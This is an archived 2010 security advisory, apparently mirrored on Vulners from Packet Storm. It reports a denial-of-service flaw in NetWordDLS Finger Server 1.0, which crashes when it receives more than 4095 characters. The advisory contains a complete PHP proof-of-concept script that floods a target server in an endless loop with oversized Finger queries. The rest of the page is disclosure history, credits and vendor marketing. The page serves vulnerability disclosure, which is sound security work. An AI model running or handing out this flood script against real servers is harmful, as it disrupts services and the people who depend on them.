Lucene search
K

NetWordDLS Finger Server 1.0 Denial Of Service

🗓️ 06 Aug 2010 00:00:00Reported by ipaxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

NetWordDLS Finger Server 1.0 DoS via Input Size Validation Fla

Code
`[DCA-0009 - NetWordDLS Finger Server Denial of Service]  
  
[Software]  
- NetWordDLS Finger Server  
  
[Vendor Product Description]  
- A windows server application that reports back to users the machine  
name and the current logged on user  
  
[Bug Description]  
- Server does not validate the input size leading to a Denial Of  
Service flaw while sending more than 4095 characters to it.  
  
[History]  
- Advisory sent to vendor on 06/20/2010.  
- No vendor response  
- Advisory publised on 08/01/2010  
  
[Impact]  
- Low  
  
[Affected Version]  
- Finger Server 1.0  
- Prior versions may also be vulnerable  
  
[Vendor Reply]  
  
  
[Codes]  
  
<?php  
require_once 'PEAR.php';  
require_once 'Net/Socket.php';  
require_once 'Net/Finger.php';  
$server = $argv[1];  
while (1==1) {  
$data = Net_Finger::query( $server, $a = str_repeat("\x90",4095)) ;  
echo $data ;  
}  
?>  
  
----------------------------------------------------------------------------------------  
  
[Credits]  
Ewerson Guimaraes (Crash)  
Pentester/Researcher  
DcLabs Security Team  
www.dclabs.com.br  
  
[Greetz]  
ipax and all DcLabs members.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Aug 2010 00:00Current
7.4High risk
Vulners AI Score7.4
16